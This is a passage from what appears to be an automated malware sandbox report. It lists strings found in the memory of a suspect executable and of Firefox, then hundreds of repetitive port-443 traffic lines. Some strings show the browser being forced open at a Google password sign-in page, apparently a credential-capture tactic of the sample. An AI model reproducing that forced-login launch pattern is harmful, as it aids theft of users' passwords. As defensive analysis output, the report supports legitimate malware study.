                      Source: firefox.exe, 0000002B.00000002.3167049287.0000023763EC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openh264.org/
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://www.openh264.org//
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                      Source: file.exe, 00000000.00000002.2614337983.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2924556550.000000000530C000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2924865239.000000000530C000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3141958097.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                      Source: firefox.exe, 0000002B.00000002.3267074024.000008519BB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tsn.ca=
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.widevine.com/
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://www.widevine.com/3
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3268067490.0000195926A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com
                      Source: firefox.exe, 0000002B.00000002.3234511924.000002376AD3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com
                      Source: firefox.exe, 0000002B.00000002.3245686886.000002376C292000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3122002241.000002376C878000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3232432878.000002376AB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account
                      Source: firefox.exe, 0000002B.00000002.3234511924.000002376AD3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                      Source: firefox.exe, 00000029.00000002.2989295851.000001C51977A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002A.00000002.3006872823.000002041BFAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
                      Source: firefox.exe, 0000002B.00000002.3160163023.00000237585F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwddedupeLogins:
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://6edd
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/accountopenPopup/openPopupPromise
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52358 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52461 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52518 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52393 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52381 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52451 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52516 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52391 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52516
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52517
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52514
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52518
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52512
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52513
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52510
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52511
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52418 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52533
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52383 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52514 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52509
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52500
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52387 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52481
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52444 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52410 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52496
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52512 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
